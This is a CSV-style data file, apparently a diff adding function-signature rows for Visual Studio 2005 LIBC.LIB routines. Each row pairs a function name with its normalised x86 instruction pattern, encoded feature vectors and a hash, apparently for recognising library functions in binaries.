+__close,"XOR EBP,EBP\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR DS:[R32]\nPOP R32\nAND BYTE PTR DS:[R32+R32+CONST],0\nTEST EBP,EBP\nJCC CONST",BWuvt9w2gQ27tlws8jwvCoZ2O+cFa6+3DczAAaqT3bIAAAAA3DaBDQ3MwAE9ZCFohnY75ySjmVwAAAAAhWSeiw3MwAE9ZCFou7ZcLOVifoS7tlws2RXZ7tw2gQ20kuPZ4QH2w4Z2O+fyPC8Ku7ZcLNkV2e7lYn6E5WJ+hNw2gQ3ZFdnuJKOZXKqT3bIAAAAAPWQhaCSjmVwAAAAAqpPdsgAAAAAAAAAAtJLj2YVknosAAAAA,[],5206cd5283866e953fcce95d078a54b42646ec91,VS2005,LIBC.LIB
+__wsetargv,"PUSH CONST\nCALL CONST\nPOP R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",a7Vi6l1tf7YP2reWIvuTj11tf7YP2reWyTc9VyL7k49rtWLqD9q3lgAAAAAAAAAAXW1/tgAAAAAAAAAA,[],f0a6b46891ba664813558f9d18290e87498ea0c8,VS2005,LIBC.LIB
+__lrotr,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,WlVPAwAAAAAAAAAA,KgsZxpfae5RR7fXbWyXZigGhdbMqCxnGuRG0PJfae5RR7fXbUe3127kRtDwBoXWzl9p7lLkRtDwBoXWzAaF1swAAAAAAAAAA,0151607032ce108db2b2cd2e24de6db320bf2044,VS2005,LIBC.LIB
+__rotr,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nMOV R32,R32\nDEC R32\nTEST R32,R32\nJCC CONST",WyXZigGhdbP3Zl4vl9p7lLkRtDwBoXWzAaF1swAAAAAAAAAAUe3127kRtDwBoXWz92ZeL7kRtDwAAAAAuRG0PJfae5RR7fXb,[],9b248855dfeb0360301abb2fd06297924a4400e2,VS2005,LIBC.LIB
+_fgetpos,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[R32],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV R32,DWORD PTR DS:[R32]\nOR R32,CONST",AaF1swAAAAAAAAAAJu7hZQGhdbMAAAAA4t4VCAGhdbMm7uFl,[],7ab2c704aee0d2a45e83d4d75c69c6134ad10930,VS2005,LIBC.LIB
+___wrt2err,"PUSH EBP\nMOV EBP,ESP\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nINC R32",Cl9jQwAAAAAAAAAA,[],d48a498e33f225c982be64826dde33d14523860d,VS2005,LIBC.LIB
+__fdopen,"MOV R32,R32\nPUSH CONST\nSAR R32,CONST\nAND R32,CONST\nPOP R32\nMOV R32,DWORD PTR DS:[R32*4]\nTEST BYTE PTR DS:[R32+R32*8+CONST],R8\nJCC CONST",6JIEk0Dpipxy6DpFcug6RUDpipzOyr7lzsq+5e6P72i7tlwsu7ZcLJyGUTiX2nuUcug6RQ3MwAHN0OPMoziUNdV/Hhzrbe2Gu7ZcLHLoOkW7tlwsW9AV4MQFbrJb0BXgu7ZcLJyGUTheo4MnnIZROA3MwAHEBW6yXqODJw3MwAEAAAAA623thtV/HhxSaOpbzdDjzOiSBJMAAAAAcug6RQ3MwAHN0OPMzdDjzOiSBJMAAAAAl9p7lHLoOkW7tlwsUmjqW9V/Hhwp+PLkxAVusuiSBJMAAAAAKfjy5JZz8F9b0BXg7o/vaO73PoMNzMABDczAAeiSBJMAAAAA7vc+g+iSBJMAAAAAW9AV4JZz8F/Vfx4c1X8eHAAAAAAAAAAAP8N6xQAAAAAAAAAAQOmKnD/DesUAAAAAlnPwXzmCfD8AAAAAOYJ8P0Dpipxy6DpFxAVusjmCfD8AAAAA,[],fe07607901592f4107a59c5067b268086bc32b2e,VS2005,LIBC.LIB
+_wprintf,"PUSH R32\nPUSH R32\nMOV R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nLEA R32,DWORD PTR SS:[ESP+CONST]",IoaudwAAAAAAAAAA,DczAASh59rYAAAAARyjsnAAAAAAAAAAAWNooOk+LzApYWXafKHn2tk+LzAr7LfG4R7G+cE+LzApY2ig6Xk6AaG1kpmL2nGVUWFl2nyh59rYAAAAAT4vMCgAAAAAAAAAAbWSmYkco7JwAAAAA9pxlVEco7JwAAAAAWNooOljaKDoNzMAB+y3xuG1kpmJeToBo,0fec0777e29cd402ebad585e4a1824920c530475,VS2005,LIBC.LIB
+__wrename,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",Ju7hZXLoOkUAAAAAcug6RVLONpUIpA1A0RRGFCbu4WWVUBzMUs42lQAAAAAAAAAACKQNQAAAAAAAAAAAlVAczHLoOkUAAAAA,[],92326d4f664371849591d7d1314580c2ba40c88d,VS2005,LIBC.LIB
+___init_monetary,"PUSH CONST\nPUSH CONST\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",qkUBftmMx3PIH5axiFwj68Pb1Cs8gszmT4vMCgAAAAAAAAAAtG2SEQAAAAAAAAAAyB+WsYhcI+u0bZIRPILM5rRtkhEAAAAA2YzHc0+LzAoAAAAAw9vUK0+LzAoAAAAA,[],61aed630497f02af3040adfc440370488a6f2006,VS2005,LIBC.LIB
+__ismbcalpha,"AND WORD PTR SS:[EBP+CONST],0\nPUSH R32\nXOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSTOS WORD PTR ES:[R32]\nMOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST",z+tiHKzfs+ac7n8wXJYKgcm7klis37PmnO5/MKzfs+bJu5JY3WlkKervkiprRHqorN+z5gAAAAAAAAAAybuSWAAAAAAAAAAA6u+SKsm7klhclgqBa0R6qKzfs+at5OIJreTiCazfs+bP62Ic,[],1bceccf0aa6db0a807a83041c1abc174412700d4,VS2005,LIBC.LIB
+__getcwd,"PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nRETN",c+sRrAAAAAAAAAAA,3xPA5RMzC++gNCdf3xPA5UKhPzpyE5fLoDQnX0KhPzoZpmb/chOXyybu4WUAAAAAJu7hZU6gi7EAAAAAiFwj65YD43nE92TBTqCLsQAAAAAAAAAAlgPjeXLoOkUAAAAAcug6RSbu4WWdC6I5nQuiOSbu4WUuVbn+xPdkwSbu4WUAAAAAQqE/Ok6gi7EAAAAAhRq1bd/1u4yIXCPrLlW5/t8TwOXfE8Dl3/W7jCbu4WWdC6I5EzML70KhPzoZpmb/GaZm/ybu4WUAAAAA,c685ccbbfd87d94a60e492c3ca0772faca7344eb,VS2005,LIBC.LIB
+__getdcwd,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nTEST R32,R32\nJCC CONST",lgPjeXLoOkUAAAAAnQuiOSbu4WUuVbn+EzML70KhPzoZpmb/cug6RSbu4WWdC6I5xPdkwSbu4WUAAAAAQqE/Ok6gi7EAAAAAhRq1bd/1u4yIXCPrLlW5/t8TwOXfE8Dl3/W7jCbu4WWdC6I53xPA5RMzC++gNCdf3xPA5UKhPzpyE5fLGaZm/ybu4WUAAAAAoDQnX0KhPzoZpmb/chOXyybu4WUAAAAAJu7hZU6gi7EAAAAAiFwj65YD43nE92TBTqCLsQAAAAAAAAAA,[],18571b15309fc3c351924171453a83396a55f6a6,VS2005,LIBC.LIB
+__validdrive,"AND BYTE PTR SS:[EBP+CONST],0\nADD R8,CONST\nMOV BYTE PTR SS:[EBP+CONST],R8\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV BYTE PTR SS:[EBP+CONST],CONST\nMOV BYTE PTR SS:[EBP+CONST],CONST\nCALL DWORD PTR DS:[0]",CXYH8LRtkhE4N+nKu7ZcLE+LzAq0bZIRODfpyk+LzAq7tlwsT4vMCgAAAAAAAAAAtG2SEQAAAAAAAAAA,[],83e91f2e1605cacaf133ed92f66a4513d5f0003f,VS2005,LIBC.LIB
+_sscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],CONST\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],R32",iXtNRgAAAAAAAAAA,kgi/tzUpQDKEcIcdNELWFQAAAAAAAAAA2M0EpjRC1hXoVavaNSlAMjUpQDKEcIcd6FWr2jRC1hXoVavaPAoaXTUpQDJcpTmJNELWFQAAAAAAAAAA6FWr2jRC1hVeo4MnXKU5iTRC1hVY2ig6XqODJzUpQDIAAAAANELWFQAAAAAAAAAANELWFQAAAAAAAAAAWNooOlylOYmSCL+3hHCHHTRC1hXYzQSm,af8a4a8fff2d25d0b64681d77097ed95effac15f,VS2005,LIBC.LIB
+_fwrite,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOVSX R32,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nPOP R32\nCMP R32,-1\nPOP R32",Ju7hZa8/p9cAAAAArz+n18TnCMan46+BZnkxNUL41tYAAAAAwFP8i5Zz8F9xWpQ6cVqUOgRnq4EAAAAAp+OvgcTnCMagNzqhlnPwXwRnq4EAAAAAoDc6oYejbX0AAAAAc3UDbSbu4WW9p/DZBGergd8TwOUuVbn+LlW5/t8TwOXkUryf5FK8n/4932cm7uFlvafw2YejbX1RT3dCJu7hZf4932cAAAAA/j3fZ6A3OqEAAAAAUU93QgRnq4FBRdAbh6NtfQRnq4FBRdAbQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAA3xPA5XN1A21y6DpFxOcIxs3vpPAAAAAAcug6RZyGUTiIXCPriFwj6ybu4WWchlE4Ju7hZc3vpPAAAAAAg5WVpMBT/ItmeTE1ze+k8EL41tYAAAAAnIZROCbu4WVp1Xg+adV4Pq8/p9cAAAAA,[],7069c37ec1a2cc2f7801771f13ad6182d5fa0fb2,VS2005,LIBC.LIB
+__fFCOS,INT3\nINT3\nINT3\nFSIN\nWAIT\nFSTSW R16\nWAIT\nSAHF,AaF1swAAAAAAAAAAs/cJwfjrCHYAAAAAVF5d/fjrCHaz9wnBKS+TBfjrCHYAAAAASAcB8fq8SsIAAAAA01sr0UgHAfEBoXWzSAcB8WKYTl4AAAAA+OsIdgAAAAAAAAAAAaF1swAAAAAAAAAA+rxKwkgHAfEBoXWzYphOXlReXf0pL5MF,[],903dcaddf1b1a18c7c966bc780cb88c84997d5cf,VS2005,LIBC.LIB
+__fFSIN,FSIN\nWAIT\nFSTSW R16\nWAIT\nSAHF\nJCC CONST,AaF1swAAAAAAAAAAVF5d/fjrCHaz9wnBKS+TBfjrCHYAAAAAs/cJwfjrCHYAAAAASAcB8WKYTl4AAAAA+OsIdgAAAAAAAAAA01sr0UgHAfEBoXWzYphOXlReXf0pL5MF,[],3105ab490cfa9f2afa9a7ffff6ba76dc1dfdabfe,VS2005,LIBC.LIB
+_ungetwc,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL CONST\nPOP R32\nCMP R32,-1\nPOP R32\nJCC CONST",9/NuaCcPdRIAAAAAnIZROP/fd/jJfKS8yXykvFX/+TMAAAAAVf/5MzlafGAAAAAA2M0Epv/fd/jYzQSm4Tj7XWuQDd1VIqwTJw91EmuQDd1VIqwTVSKsE2uQDd2D8oEZg/KBGf/fd/gAAAAA/993+DlafGAAAAAAOVp8YAAAAAAAAAAAfAvOiP/fd/jrqEL4a5AN3bu2XCychlE4nIZROP/fd/gAIsLV66hC+JyGUTjYzQSmACLC1bu2XCwAAAAAu7ZcLPCfkreTBRcVkwUXFfCfkrcAAAAA2M0Epv/fd/ichlE4nIZROHE70CWGWmdV8J+StzlafGAAAAAAhlpnVWuQDd3nC9+XcTvQJWuQDd3nC9+X5wvfl+E4+133825oa5AN3VX/+TOchlE4,[],13590afe72e55d56dbb7c214b6b3031552ee4b49,VS2005,LIBC.LIB
+__seterrormode,PUSH DWORD PTR SS:[ESP+CONST]\nCALL DWORD PTR DS:[0]\nRETN,7AikZQAAAAAAAAAA,[],be3b173159f166d7ab0055de0233f7eeaf25ce5c,VS2005,LIBC.LIB
+__getstream,"MOV R32,R32\nPUSH CONST\nSHL CONST,CONST\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR DS:[R32+R32],R32\nMOV R32,DWORD PTR DS:[0]",cug6RcepA19vt3Ayxmv3fZMmQ14nD3USb7dwMsepA18AAAAAzAMah8epA1/7s3ShJw91EjVDc0D4Ptsu+D7bLsZr931eo4MnXqODJ8epA18AAAAAx6kDXwAAAAAAAAAANUNzQHLoOkUAAAAA+7N0oZMmQ14nD3USkyZDXsepA18m7uFlJu7hZXLoOkUAAAAA,[],3d954499dd6b24f7bce4ca67a7d5bd3e809cf3f6,VS2005,LIBC.LIB
+__ismbcdigit,"AND WORD PTR SS:[EBP+CONST],0\nPUSH R32\nXOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nSTOS WORD PTR ES:[R32]\nMOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST",a0R6qK3k4gms37PmrN+z5gAAAAAAAAAAreTiCazfs+bP62IcFHVKWQAAAAAAAAAAz+tiHKzfs+YnD3US3WlkKSQDw51rRHqosSEAqQAAAAAAAAAAJw91Eqzfs+bJu5JYybuSWAAAAAAAAAAAJAPDnbEhAKkUdUpZ,[],f61863751474e3d64ff535295341c15b45b28b5c,VS2005,LIBC.LIB
+__ismbcupper,"MOV R8,BYTE PTR DS:[R32+CONST]\nAND R8,CONST\nSUB R8,CONST\nNEG R8\nSBB R32,R32\nINC R32\nLEAVE\nRETN",z+tiHKzfs+YnD3US3WlkKU/npfprRHqoJw91Eqzfs+bJu5JYybuSWAAAAAAAAAAAT+el+gAAAAAAAAAAa0R6qK3k4gms37PmrN+z5gAAAAAAAAAAreTiCazfs+bP62Ic,[],349096572c3acdb650a052156e57049136e2aa9c,VS2005,LIBC.LIB
+??9type_info@@QBEHABV0@@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nADD R32,CONST\nADD R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nNEG R32\nPOP R32",dC31jAAAAAAAAAAA,2M0EplLONpUUxIhqWNooOrNMcUNhgyZHESeFcFjaKDpRaNZQUWjWUNok6RXYzQSmrZMNRVLONpVY2ig62M0EplLONpUUxIhq2M0EplLONpUUxIhqTGFsVlFo1lAm7uFlFMSIatok6RXYzQSmFMSIatok6RXYzQSm2M0EplLONpXEkqZoWNooOlFo1lCzTHFDFMSIatok6RVMYWxWJu7hZVLONpUAAAAAxJKmaFFo1lAAAAAAUs42lQAAAAAAAAAAB2Gehtok6RXYzQSm2iTpFQAAAAAAAAAAYYMmR9ok6RWtkw1Fs0xxQ9ok6RXYzQSm2M0EplLONpUHYZ6G,845608f31702479d9e61c5185a556dc115bb33d5,VS2005,LIBC.LIB
+??1type_info@@UAE@XZ,"MOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR DS:[R32+CONST]\nTEST R32,R32\nJCC CONST",AaF1swAAAAAAAAAAuZvuqgGhdbMAAAAA8egd3QGhdbO5m+6q,[],ba6adf77d29bdc6c548b69a91c40be27fa3125d1,VS2005,LIBC.LIB
+??8type_info@@QBEHABV0@@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nADD R32,CONST\nADD R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nNEG R32\nPOP R32",0DmgdgAAAAAAAAAA,B2Gehtok6RXYzQSm2iTpFQAAAAAAAAAAs0xxQ9ok6RXYzQSm2M0EplLONpUUxIhqWNooOrNMcUNhgyZHFMSIatok6RVMYWxWUWjWUNok6RXYzQSmWNooOlFo1lCzTHFD2M0EplLONpUUxIhqTGFsVlFo1lAm7uFlYYMmR9ok6RWtkw1FFMSIatok6RXYzQSmrZMNRVLONpVY2ig6FMSIatok6RXYzQSm2M0EplLONpUUxIhq2M0EplLONpXEkqZoESeFcFjaKDpRaNZQ2M0EplLONpUHYZ6GJu7hZVLONpUAAAAAxJKmaFFo1lAAAAAAUs42lQAAAAAAAAAA,b08397265f071b56986dea915a16318ee578ba50,VS2005,LIBC.LIB
+??0type_info@@AAE@ABV0@@Z,"MOV R32,R32\nMOV DWORD PTR DS:[R32],0\nRETN CONST",OsQN6wAAAAAAAAAA,[],2a18900a134cd92fb783aaa61ea26978c34539e0,VS2005,LIBC.LIB
+??_Gtype_info@@UAEPAXI@Z,"PUSH R32\nMOV R32,R32\nCALL CONST\nTEST BYTE PTR SS:[ESP+CONST],CONST\nJCC CONST",gP0ifgAAAAAAAAAAuZvuqoD9In4AAAAA+nrC6ID9In65m+6q,[],dce23762d3b57468317df6103846af1d0f9a31e2,VS2005,LIBC.LIB
+??4type_info@@AAEAAV0@ABV0@@Z,"MOV R32,R32\nRETN CONST",xkWDOwAAAAAAAAAA,[],6af8cd187de10a5bf6a46ae3cc1999858048d3de,VS2005,LIBC.LIB
+?before@type_info@@QBEHABV1@@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nADD R32,CONST\nADD R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nPOP R32\nPOP R32",EfdyCQAAAAAAAAAA,rZMNRVLONpVY2ig6FMSIatok6RXYzQSm2M0EplLONpXEkqZoJu7hZVLONpUAAAAAxJKmaFFo1lAAAAAAESeFcFjaKDpRaNZQWNooOlFo1lCzTHFDB2Gehtok6RXYzQSm2iTpFQAAAAAAAAAA2M0EplLONpUUxIhqTGFsVlFo1lAm7uFls0xxQ9ok6RXYzQSm2M0EplLONpUUxIhqWNooOrNMcUNhgyZHUs42lQAAAAAAAAAAFMSIatok6RVMYWxWUWjWUNok6RXYzQSm2M0EplLONpUUxIhq2M0EplLONpUHYZ6GYYMmR9ok6RWtkw1FFMSIatok6RXYzQSm,974ab8d51f83135fe757cd19fce83c72a4c48144,VS2005,LIBC.LIB
+?raw_name@type_info@@QBEPBDXZ,"LEA R32,DWORD PTR DS:[R32+CONST]\nRETN",TmbFFwAAAAAAAAAA,[],a5b6670a630668fc36ac87b040020206d1934689,VS2005,LIBC.LIB
+___doserrno,"MOV R32,0\nRETN",yHOnCgAAAAAAAAAA,[],8b5a3b7dbc891bdf30ecdd7bd8e7f923d92dba2e,VS2005,LIBC.LIB
+__errno,"MOV R32,0\nRETN",yHOnCgAAAAAAAAAA,[],8b5a3b7dbc891bdf30ecdd7bd8e7f923d92dba2e,VS2005,LIBC.LIB
+_setvbuf,"OR R32,CONST\nPUSH CONST\nMOV DWORD PTR DS:[R32+CONST],R32\nLEA R32,DWORD PTR DS:[R32+CONST]\nPOP R32\nJMP SHORT CONST",c6IZYQAAAAAAAAAAWNooOsSSpmhy6DpFLokCbgAAAAAAAAAA48qFdLot6+cAAAAA8I9jrqf9HZa7tlwsLlW5/j/gbRSIXCPrcug6Raf9HZa7tlwsu7ZcLKf9HZbEkqZoP+BtFLot6+cAAAAAiFwj6+PKhXQzwu4mxJKmaC6JAm4AAAAAui3r53OiGWEAAAAAp/0dli5Vuf4of21tKH9tbbot6+cAAAAAM8LuJnOiGWEAAAAAu7ZcLMSSpmhY2ig6,[],aeb265b211668d5a36b6e0a8ace5c54755dc695d,VS2005,LIBC.LIB
+__wutime,"PUSH R32\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nPOP R32",FVxIpQAAAAAAAAAAwrxAVgAAAAAAAAAA/cc7ThVcSKXCvEBW,[],433d14734d0775e3a378445b81514ee0816b07cc,VS2005,LIBC.LIB
+_modf,"PUSH R32\nPUSH R32\nFSTP QWORD PTR SS:[ESP]\nCALL CONST\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32",88N+uEL41tYAAAAA0PwusB9sbd8AAAAAH2xt35HbufcAAAAAkA+3Fx9sbd8AAAAAy4fDcJAPtxfQ/C6wu7ZcLMWq8Y67tlwseKEJIEL41tYAAAAAUEfB6vPDfri7tlwskdu590L41tYAAAAAu7ZcLPPDfrh4oQkgQvjW1gAAAAAAAAAAxarxjpHbufcAAAAA31ZDu8uHw3BQR8Hq,[],10b8e5adf826e099f5ed59116496391a259e77b5,VS2005,LIBC.LIB
+__stricoll,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,WlVPAwAAAAAAAAAAeUxKbwAAAAAAAAAAm5BQ/AAAAAAAAAAAS6l9YE6jm9taVU8DTqOb25uQUPx5TEpv,[],d39fdcc3759c02455d1f69bc0af5303bd87b4656,VS2005,LIBC.LIB
+_putc,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,WlVPAwAAAAAAAAAA,9Z1nqQAAAAAAAAAAu8PygvWdZ6nrsSys67EsrAAAAAAAAAAA,0151607032ce108db2b2cd2e24de6db320bf2044,VS2005,LIBC.LIB
+_fputc,PUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,u8PygvWdZ6nrsSys67EsrAAAAAAAAAAA9Z1nqQAAAAAAAAAA,[],ac6af20fbb02c713f785bb8456cc30a49aade5fe,VS2005,LIBC.LIB
+__mbsncmp,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR SS:[EBP+CONST],0\nPUSH R32\nPUSH R32\nPUSH R32\nJCC CONST",j+LO/TuHiJYNzMABQY18GzNvNx8m7uFlO4eIljNvNx8AAAAAj+LO/TuHiJYNzMAB42zqJjNvNx8AAAAADczAAYz41XgAAAAAJAPDneNs6ibnv3pWJu7hZaqT3bIAAAAAqpPdsgAAAAAAAAAAO4eIloz41XgAAAAAM283HzNvNx+P4s79ADmPt6qT3bIAAAAAM283H4z41XiP4s79jPjVeAA5j7eM+NV471hmHCbu4WUkA8OdDczAATNvNx8AAAAAjPjVeCbu4WVBjXwb5796VqqT3bIAAAAA,[],fce6f66ef1ae2dffc52d17025a19dd508bc5d6a3,VS2005,LIBC.LIB
+__mbsncat,"MOV R32,R32\nSUB R32,DWORD PTR SS:[EBP+CONST]\nDEC R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nCMP R32,CONST",XqODJ/zUKy0AAAAA5TGl2DTg+sKgOuGLu6u5tDTg+sKgOuGL5CwKC1ylOYmhRJo1NOD6ws8K/YP81Cst9R00ATTg+sKgOuGL++ycfz/DesUAAAAAJAPDneQsCgv77Jx/XKU5iVylOYmhRJo1/NQrLfUdNAFeo4Mny4LLlT/DesUAAAAAWCuPVqAdPDoAAAAAoUSaNburubTlMaXYXqODJ88K/YMAAAAAEG9j8qAdPDoAAAAA91t2ViQDw53LgsuVoB08Oj/DesUAAAAAzwr9gxBvY/JYK49WoDrhi9yaQ/Neo4MnP8N6xQAAAAAAAAAA3JpD8xBvY/JYK49W,[],417ad3f5df350d07c9feba4abf7c64602016d20c,VS2005,LIBC.LIB
+__mbstrlen,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH CONST\nPUSH -1\nPUSH R32\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL DWORD PTR DS:[0]",naCIM4/izv0AAAAAWCp05gDh1msAAAAAYZqBiQDh1mudoIgzwrxAVgAAAAAAAAAAAOHWawAAAAAAAAAAkaYkKibu4WXCvEBWJu7hZY/izv0AAAAAj+LO/QDh1msCMQLBAjECwZ2giDNhmoGJqkUBfpGmJCpYKnTm,[],398021bb0647acadf435484683b40c043a871f08,VS2005,LIBC.LIB
+__isatty,"MOV R32,R32\nAND R32,CONST\nSAR R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOV R8,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nRETN",0VPYDAAAAAAAAAAAwH/MmdFT2AxSzjaVUs42lQAAAAAAAAAA,[],b128eb9082f2553315f7b9935534f169f7025952,VS2005,LIBC.LIB
+__mbctolower,"MOV R32,R32\nMOV BYTE PTR SS:[EBP+CONST],R8\nSHR R32,CONST\nMOV BYTE PTR SS:[EBP+CONST],R8\nMOVZX R32,R8\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",NBHms+udzdcv7pjqI7LwxU6gi7EAAAAAZboOguudzdc0EeazL+6Y6k6gi7EAAAAA653N1wAAAAAAAAAATqCLsQAAAAAAAAAAPi95kKqYhDVlug6CqpiENeudzdcjsvDF,[],576343e8eed0af75770fe16bab9a5c13e9cd17b0,VS2005,LIBC.LIB
+__freebuf,"PUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nAND WORD PTR DS:[R32+CONST],CONST\nXOR R32,R32\nPOP R32\nMOV DWORD PTR DS:[R32],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32",AOHWawAAAAAAAAAAzE58YgDh1msAAAAA2M0EpgDh1mvMTnxijrcEmwDh1mvYzQSm,[],1046a579fcec8ff32bf382a61c02e35eef166586,VS2005,LIBC.LIB
+__CIasin,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,vKBd6AAAAAAAAAAAAaF1swAAAAAAAAAAdqHX0LygXegBoXWz,6cdf2d7fc5f86ec692fc42d5b7065c57cd45ccfb,VS2005,LIBC.LIB
+_asin,"FLD1\nFADD ST,ST(1)\nFLD1\nFSUB ST,ST(2)\nFMULP ST(1),ST\nFSQRT\nFPATAN\nCMP DWORD PTR DS:[0],0",8BCZXpDioRGa+uLm0UiUpYp8rQWKfK0FN9QtU9FIlKUAAAAA0UiUpXtGESB7RhEg6FWr2iGHeWMb5FApG+RQKYp8rQWKfK0FyNV7xCGHeWMb5FAp6FWr2jfULVPNLBGminytBSGHeWMAAAAAAFkkeehVq9qc7n8wmvri5tFIlKWxde5HzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAAkOKhEXtGESB7RhEgsXXuR9FIlKUAAAAAIYd5Y5DioRHwEJlenO5/MOhVq9rI1XvE,[],c327768c097b0d2c2fddb3479e85753d5eb67750,VS2005,LIBC.LIB
+__putw,"PUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH CONST\nLEA R32,DWORD PTR SS:[ESP+CONST]\nPOP R32",vKBd6AAAAAAAAAAAs5jnm+KEcncAAAAAYVmRBd8TwOUAAAAA4oRyd98TwOVUE5VZVBOVWbygXeibkFD83xPA5bOY55v1lEmz9ZRJs+KEcncAAAAAm5BQ/AAAAAAAAAAA,[],6c9a6c5f47c31f2dba698609b1b88dbd5319f095,VS2005,LIBC.LIB
+__global_unwind2,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH EBP\nPUSH CONST\nPUSH CONST",CE0YgQAAAAAAAAAA,/k/SaAAAAAAAAAAA,ab81d8e1913c531357b65f2932a50c6582d9bce4,VS2005,LIBC.LIB
+__NLG_Dispatch,POP R32\nPOP R32\nRETN CONST,thT/cgAAAAAAAAAA,[],00fee282e115bcc0153c4698853e2ca15ba9efdd,VS2005,LIBC.LIB
+__abnormal_termination,"XOR R32,R32\nMOV R32,DWORD PTR FS:[0]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",nH7raQGhdbPDHAhuAaF1swAAAAAAAAAAwxwIbgGhdbMqs0LeKrNC3gGhdbMAAAAA,[],ae81d3614bdc3bdb3487bea9cb58e1595fcc4cf9,VS2005,LIBC.LIB
+__NLG_Notify,"PUSH R32\nPUSH R32\nMOV R32,0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],EBP\nPOP R32",Zj3ApgAAAAAAAAAA,[],e2dfe0dc18f77a56a1646de38489656df393013c,VS2005,LIBC.LIB
+__local_unwind2,"LEA R32,DWORD PTR DS:[R32+R32*2]\nMOV R32,DWORD PTR DS:[R32+R32*4]\nMOV DWORD PTR SS:[ESP+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nCMP DWORD PTR DS:[R32+R32*4+CONST],0\nJCC CONST",nIZROAxY8MgupUYELqVGBF6jgycAAAAAXqODJ1Bj7vIAAAAADFjwyAAAAAAAAAAAUGPu8gxY8MichlE4bJ2YngxY8MichlE4,[],191c373f85ee0f43a00edddeca20306cdffb40bd,VS2005,LIBC.LIB
